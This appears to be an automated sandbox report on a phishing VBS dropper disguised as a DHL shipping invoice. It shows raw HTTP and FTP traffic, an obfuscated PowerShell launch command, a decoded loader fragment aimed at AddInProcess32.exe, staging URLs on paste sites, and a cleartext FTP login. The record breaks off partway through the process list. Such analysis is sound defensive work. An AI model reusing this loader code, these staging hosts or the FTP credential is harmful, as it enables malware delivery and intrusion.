                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8d66ad2b4dd3eae9-DFW
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                2024-10-22 04:17:13 UTC190INData Raw: 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20 63 66 4c 34 3b 64 65 73 63 3d 22 3f 70 72 6f 74 6f 3d 54 43 50 26 72 74 74 3d 31 34 34 39 26 73 65 6e 74 3d 34 26 72 65 63 76 3d 36 26 6c 6f 73 74 3d 30 26 72 65 74 72 61 6e 73 3d 30 26 73 65 6e 74 5f 62 79 74 65 73 3d 32 38 31 36 26 72 65 63 76 5f 62 79 74 65 73 3d 36 38 31 26 64 65 6c 69 76 65 72 79 5f 72 61 74 65 3d 32 30 37 33 30 31 33 26 63 77 6e 64 3d 32 34 32 26 75 6e 73 65 6e 74 5f 62 79 74 65 73 3d 30 26 63 69 64 3d 33 36 64 65 64 33 33 66 66 66 61 35 31 31 63 62 26 74 73 3d 32 39 37 26 78 3d 30 22 0d 0a 0d 0a
                                                                                                Data Ascii: server-timing: cfL4;desc="?proto=TCP&rtt=1449&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2816&recv_bytes=681&delivery_rate=2073013&cwnd=242&unsent_bytes=0&cid=36ded33fffa511cb&ts=297&x=0"
                                                                                                2024-10-22 04:17:13 UTC1318INData Raw: 66 37 66 0d 0a 54 56 71 51 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4d e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 45 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 2f 2f 38 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4c 67 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 51 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93
                                                                                                Data Ascii: f7fTVqQ::M::::E:::://8::Lg:::::::::Q:::::::::::::
                                                                                                2024-10-22 04:17:13 UTC1369INData Raw: 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4d e2 86 93 3a e2 86 93 59 49 55 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 42 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 42 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 45 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 45 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 42 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a
                                                                                                Data Ascii: ::::M:YIU::B:::B::::::E:::E::::::::B:::::::::
                                                                                                2024-10-22 04:17:13 UTC1287INData Raw: 86 93 e2 86 93 3a e2 86 93 67 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 30 67 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 49 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 43 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 47 e2 86 93 3a e2 86 93 75 63 6e 4e 79 59 77 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86
                                                                                                Data Ascii: :g::::0g::::I::::::::::::::::::C:::G:ucnNyYw:::
                                                                                                2024-10-22 04:17:13 UTC1369INData Raw: 37 66 66 61 0d 0a 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2
                                                                                                Data Ascii: 7ffa::::::::::::::::::::::::::::::::::::
                                                                                                2024-10-22 04:17:13 UTC1369INData Raw: e2 86 93 e2 86 93 3a e2 86 93 42 51 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 47 45 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 56 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4a 67 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 48 55 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 34 6c 77 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 42 65 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 51 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 42 43 e2 86 93 3a e2 86 93 44 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4f 49 77 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93
                                                                                                Data Ascii: :BQ:::GE::::V::::Jg:::HU::::4lw:::Be::Q::BC:D::::OIw::
                                                                                                2024-10-22 04:17:13 UTC1369INData Raw: 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4d 77 43 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4d e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 44 67 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 43 67 43 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 47 4b 67 4d 77 43 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4d e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 44 67 e2 86 93 3a e2
                                                                                                Data Ascii: ::MwC::M:::::::::Dg::::::CgC:::GKgMwC::M:::::::::Dg:
                                                                                                2024-10-22 04:17:13 UTC1369INData Raw: 86 93 e2 86 93 3a e2 86 93 44 67 67 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4b 6a 6a 45 2f 2f 2f 2f 4f 75 66 2f 2f 2f 38 6d 49 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 34 7a 76 2f 2f 2f 7a 6a 58 2f 2f 2f 2f 4f 4b 44 2f 2f 2f 38 34 32 2f 2f 2f 2f 77 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4d 77 43 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4d e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 44 67 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a
                                                                                                Data Ascii: :Dgg::::KjjE////Ouf///8mI::::::4zv///zjX////OKD///842////w::::MwC::M:::::::::Dg:::
                                                                                                2024-10-22 04:17:13 UTC1369INData Raw: 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 44 67 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 66 67 51 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 51 55 2f 67 45 71 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 44 4d e2 86 93 3a e2 86 93 67 e2 86 93 3a e2 86 93 43 77 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 34 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 48 34 45 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 45 4b 67 e2 86 93 3a
                                                                                                Data Ascii: :::Dg:::::fgQ:::QU/gEq:::DM:g:Cw:::::::::4:::::H4E:::EKg:
                                                                                                2024-10-22 04:17:13 UTC1369INData Raw: e2 86 93 3a e2 86 93 48 36 78 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 45 65 30 73 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 51 34 55 77 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 44 68 65 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4f 44 6e 2f 2f 2f 38 34 74 66 2f 2f 2f 7a 67 7a 2f 2f 2f 2f 4f 53 37 2f 2f 2f 38 6d 49 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 34 65 50 2f 2f 2f 7a 67 65 2f 2f 2f 2f 4f 68 6e 2f 2f 2f 38 6d 49 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 34 68 76 2f 2f 2f 7a 67
                                                                                                Data Ascii: :H6x:::Ee0s:::Q4Uw:::Dhe::::ODn///84tf///zgz////OS7///8mI::::::4eP///zge////Ohn///8mI::::::4hv///zg


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49735 | 188.114.96.34 | 443 | 1928 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-22 04:17:15 UTC | 69 | OUT | GET /class.txt HTTP/1.1
                                                                                                Host: b2case.com
                                                                                                Connection: Keep-Alive
2024-10-22 04:17:16 UTC | 839 | IN | HTTP/1.1 200 OK
                                                                                                Date: Tue, 22 Oct 2024 04:17:16 GMT
                                                                                                Content-Type: text/plain
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Last-Modified: Tue, 22 Oct 2024 03:17:47 GMT
                                                                                                ETag: W/"a1000-6250836a4ccc0-gzip"
                                                                                                Vary: Accept-Encoding
                                                                                                cf-cache-status: DYNAMIC
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EE7bzH349YYPR2ryJ1t5D12rXKt1bDswXyRO8hrRRXXP0RTEFuuh7dLZeAReseNI6ipgFpSiWsyaegFuZxAchGlEGyyssujiSBgRABh5ItiZOhHLt8%2FQ4bT4mLq9"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8d66ad39a9c46b11-DFW
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1173&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2821&recv_bytes=683&delivery_rate=2364081&cwnd=225&unsent_bytes=0&cid=75d2527444612c1c&ts=421&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49741 | 188.114.96.3 | 443 | 1928 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-22 04:17:20 UTC | 43 | OUT | GET /d/r322U/0 HTTP/1.1
Host: paste.ee
2024-10-22 04:17:21 UTC | 1225 | IN | HTTP/1.1 200 OK
                                                                                                Date: Tue, 22 Oct 2024 04:17:21 GMT
                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                Content-Length: 582
                                                                                                Connection: close
                                                                                                Cache-Control: max-age=2592000
                                                                                                strict-transport-security: max-age=63072000
                                                                                                x-frame-options: DENY
                                                                                                x-content-type-options: nosniff
                                                                                                x-xss-protection: 1; mode=block
                                                                                                content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none'
                                                                                                cf-cache-status: DYNAMIC
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vtyiMkN5cyj%2BWQQSptCtqMBmum7BJd1wjGGJjIj5Yp3N9WZgqO4V83%2F5krvAAYizkhUwyNDf94PsppiCuxolt9EvlMn8DmMfemV4FhvrnPQOSvx8%2Fuin243Rew%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8d66ad5a5d254686-DFW
                                                                                                alt-svc: h3=":443"; ma=86400
2024-10-22 04:17:21 UTC | 190 | IN | server-timing: cfL4;desc="?proto=TCP&rtt=1193&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2816&recv_bytes=681&delivery_rate=2399337&cwnd=251&unsent_bytes=0&cid=e7c31ad285e6f370&ts=304&x=0"
2024-10-22 04:17:21 UTC | 582 | IN | response body (decoded from the raw bytes, line breaks as in the original data; the 0xE2 0x86 0x93 sequence is the "↓" character):
$zsbDt = 'C:\Windows\Microsoft.NET\' + 'Framework\v4.0.30319\' + 'AddInProcess32.exe';

$XohsK = "??%yzXVM%"

$UebTa = '↓:↓';
$XKvHv = 'A';

$WYvtt = '%qlxKP%'.replace( $UebTa, $XKvHv );
[Byte[]] $laWwJ = [System.Convert]::FromBase64String( $WYvtt );


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49744 | 104.20.4.235 | 443 | 7820 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-22 04:17:24 UTC | 74 | OUT | GET /raw/pQQ0n3eA HTTP/1.1
Host: pastebin.com
Connection: Keep-Alive
2024-10-22 04:17:24 UTC | 391 | IN | HTTP/1.1 200 OK
                                                                                                Date: Tue, 22 Oct 2024 04:17:24 GMT
                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                x-frame-options: DENY
                                                                                                x-content-type-options: nosniff
                                                                                                x-xss-protection: 1;mode=block
                                                                                                cache-control: public, max-age=1801
                                                                                                CF-Cache-Status: EXPIRED
                                                                                                Last-Modified: Tue, 22 Oct 2024 04:17:24 GMT
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8d66ad6f6ac1a912-DFW
2024-10-22 04:17:24 UTC | 11 | IN | chunk "6\r\nfalse,\r\n" (chunked body: false,)
2024-10-22 04:17:24 UTC | 5 | IN | chunk "0\r\n\r\n" (terminating chunk)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 49746 | 104.20.4.235 | 443 | 8100 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-22 04:17:27 UTC | 74 | OUT | GET /raw/pQQ0n3eA HTTP/1.1
Host: pastebin.com
Connection: Keep-Alive
2024-10-22 04:17:27 UTC | 395 | IN | HTTP/1.1 200 OK
                                                                                                Date: Tue, 22 Oct 2024 04:17:27 GMT
                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                x-frame-options: DENY
                                                                                                x-content-type-options: nosniff
                                                                                                x-xss-protection: 1;mode=block
                                                                                                cache-control: public, max-age=1801
                                                                                                CF-Cache-Status: HIT
                                                                                                Age: 3
                                                                                                Last-Modified: Tue, 22 Oct 2024 04:17:24 GMT
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8d66ad80fc5d6bbc-DFW
2024-10-22 04:17:27 UTC | 11 | IN | chunk "6\r\nfalse,\r\n" (chunked body: false,)
2024-10-22 04:17:27 UTC | 5 | IN | chunk "0\r\n\r\n" (terminating chunk)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.4 | 49749 | 104.20.4.235 | 443 | 2676 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-22 04:17:35 UTC | 74 | OUT | GET /raw/pQQ0n3eA HTTP/1.1
Host: pastebin.com
Connection: Keep-Alive
2024-10-22 04:17:35 UTC | 396 | IN | HTTP/1.1 200 OK
                                                                                                Date: Tue, 22 Oct 2024 04:17:35 GMT
                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                x-frame-options: DENY
                                                                                                x-content-type-options: nosniff
                                                                                                x-xss-protection: 1;mode=block
                                                                                                cache-control: public, max-age=1801
                                                                                                CF-Cache-Status: HIT
                                                                                                Age: 11
                                                                                                Last-Modified: Tue, 22 Oct 2024 04:17:24 GMT
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8d66adb4dad53ab8-DFW
2024-10-22 04:17:35 UTC | 11 | IN | chunk "6\r\nfalse,\r\n" (chunked body: false,)
2024-10-22 04:17:35 UTC | 5 | IN | chunk "0\r\n\r\n" (terminating chunk)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.4 | 49750 | 104.20.4.235 | 443 | 7972 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-22 04:17:44 UTC | 74 | OUT | GET /raw/pQQ0n3eA HTTP/1.1
Host: pastebin.com
Connection: Keep-Alive
2024-10-22 04:17:44 UTC | 396 | IN | HTTP/1.1 200 OK
                                                                                                Date: Tue, 22 Oct 2024 04:17:44 GMT
                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                x-frame-options: DENY
                                                                                                x-content-type-options: nosniff
                                                                                                x-xss-protection: 1;mode=block
                                                                                                cache-control: public, max-age=1801
                                                                                                CF-Cache-Status: HIT
                                                                                                Age: 20
                                                                                                Last-Modified: Tue, 22 Oct 2024 04:17:24 GMT
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8d66adee4c613ac7-DFW
2024-10-22 04:17:44 UTC | 11 | IN | chunk "6\r\nfalse,\r\n" (chunked body: false,)
2024-10-22 04:17:44 UTC | 5 | IN | chunk "0\r\n\r\n" (terminating chunk)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.4 | 49751 | 104.20.4.235 | 443 | 6644 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-22 04:17:52 UTC | 74 | OUT | GET /raw/pQQ0n3eA HTTP/1.1
Host: pastebin.com
Connection: Keep-Alive
2024-10-22 04:17:52 UTC | 396 | IN | HTTP/1.1 200 OK
                                                                                                Date: Tue, 22 Oct 2024 04:17:52 GMT
                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                x-frame-options: DENY
                                                                                                x-content-type-options: nosniff
                                                                                                x-xss-protection: 1;mode=block
                                                                                                cache-control: public, max-age=1801
                                                                                                CF-Cache-Status: HIT
                                                                                                Age: 28
                                                                                                Last-Modified: Tue, 22 Oct 2024 04:17:24 GMT
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8d66ae1f7df56c07-DFW
                                                                                                2024-10-22 04:17:52 UTC11INData Raw: 36 0d 0a 66 61 6c 73 65 2c 0d 0a
                                                                                                Data Ascii: 6false,
                                                                                                2024-10-22 04:17:52 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
Oct 22, 2024 06:17:05.341645956 CEST | 21 | 49730 | 191.252.83.213 | 192.168.2.4 | 220 "Servico de FTP da Locaweb"
Oct 22, 2024 06:17:05.342750072 CEST | 49730 | 21 | 192.168.2.4 | 191.252.83.213 | USER desckvbrat1
Oct 22, 2024 06:17:05.618324995 CEST | 21 | 49730 | 191.252.83.213 | 192.168.2.4 | 331 Username ok, send password.
Oct 22, 2024 06:17:05.618571043 CEST | 49730 | 21 | 192.168.2.4 | 191.252.83.213 | PASS BFwGyaUBMY1578@@
Oct 22, 2024 06:17:05.896672010 CEST | 21 | 49730 | 191.252.83.213 | 192.168.2.4 | 230 Login successful.
Oct 22, 2024 06:17:06.168792009 CEST | 21 | 49730 | 191.252.83.213 | 192.168.2.4 | 501 Invalid argument.
Oct 22, 2024 06:17:06.169037104 CEST | 49730 | 21 | 192.168.2.4 | 191.252.83.213 | PWD
Oct 22, 2024 06:17:06.440356016 CEST | 21 | 49730 | 191.252.83.213 | 192.168.2.4 | 257 "/" is the current directory.
Oct 22, 2024 06:17:06.440857887 CEST | 49730 | 21 | 192.168.2.4 | 191.252.83.213 | TYPE I
Oct 22, 2024 06:17:06.712142944 CEST | 21 | 49730 | 191.252.83.213 | 192.168.2.4 | 200 Type set to: Binary.
Oct 22, 2024 06:17:06.712310076 CEST | 49730 | 21 | 192.168.2.4 | 191.252.83.213 | PASV
Oct 22, 2024 06:17:06.984183073 CEST | 21 | 49730 | 191.252.83.213 | 192.168.2.4 | 227 Entering passive mode (191,252,83,213,234,209).
Oct 22, 2024 06:17:06.993275881 CEST | 49730 | 21 | 192.168.2.4 | 191.252.83.213 | RETR Upcrypter/01/DLL01.txt
Oct 22, 2024 06:17:07.265403032 CEST | 21 | 49730 | 191.252.83.213 | 192.168.2.4 | 150 File status okay. About to open data connection.
Oct 22, 2024 06:17:07.765045881 CEST | 21 | 49730 | 191.252.83.213 | 192.168.2.4 | 226 Transfer complete.
Oct 22, 2024 06:17:10.595839977 CEST | 49730 | 21 | 192.168.2.4 | 191.252.83.213 | PASV
Oct 22, 2024 06:17:10.910274982 CEST | 49730 | 21 | 192.168.2.4 | 191.252.83.213 | PASV
Oct 22, 2024 06:17:11.517538071 CEST | 49730 | 21 | 192.168.2.4 | 191.252.83.213 | PASV
Oct 22, 2024 06:17:11.911505938 CEST | 21 | 49730 | 191.252.83.213 | 192.168.2.4 | 227 Entering passive mode (191,252,83,213,235,2).
Oct 22, 2024 06:17:11.917931080 CEST | 49730 | 21 | 192.168.2.4 | 191.252.83.213 | RETR Upcrypter/01/Rumpe.txt
Oct 22, 2024 06:17:12.189333916 CEST | 21 | 49730 | 191.252.83.213 | 192.168.2.4 | 150 File status okay. About to open data connection.
Oct 22, 2024 06:17:12.674597025 CEST | 21 | 49730 | 191.252.83.213 | 192.168.2.4 | 226 Transfer complete.
Oct 22, 2024 06:17:19.147663116 CEST | 49730 | 21 | 192.168.2.4 | 191.252.83.213 | PASV
Oct 22, 2024 06:17:19.419469118 CEST | 21 | 49730 | 191.252.83.213 | 192.168.2.4 | 227 Entering passive mode (191,252,83,213,237,38).
Oct 22, 2024 06:17:19.425901890 CEST | 49730 | 21 | 192.168.2.4 | 191.252.83.213 | RETR Upcrypter/01/Entry.txt
Oct 22, 2024 06:17:19.698240995 CEST | 21 | 49730 | 191.252.83.213 | 192.168.2.4 | 150 File status okay. About to open data connection.
Oct 22, 2024 06:17:20.183093071 CEST | 21 | 49730 | 191.252.83.213 | 192.168.2.4 | 226 Transfer complete.


                                                                                                Target ID:0
                                                                                                Start time:00:16:58
                                                                                                Start date:22/10/2024
                                                                                                Path:C:\Windows\System32\wscript.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHLShippingInvoicesAwbBL000000000102220242247.vbs"
                                                                                                Imagebase:0x7ff722590000
                                                                                                File size:170'496 bytes
                                                                                                MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                Target ID:1
                                                                                                Start time:00:16:59
                                                                                                Start date:22/10/2024
                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                Wow64 process (32bit):false
Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $qKKzc = '[obfuscated base64 string literal omitted]';$hsdzv = $qKKzc; ;$hsdzv = $qKKzc.replace('???' , 'B') ;;$qqbfx = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String( $hsdzv ) ); $qqbfx = $qqbfx[-1..-$qqbfx.Length] -join '';$qqbfx = $qqbfx.replace('%XRqhI%','C:\Users\user\Desktop\DHLShippingInvoicesAwbBL000000000102220242247.vbs');powershell $qqbfx
                                                                                                Imagebase:0x7ff788560000
                                                                                                File size:452'608 bytes
                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:false

                                                                                                Target ID:2
                                                                                                Start time:00:16:59
                                                                                                Start date:22/10/2024
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff7699e0000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:false

                                                                                                Target ID:3
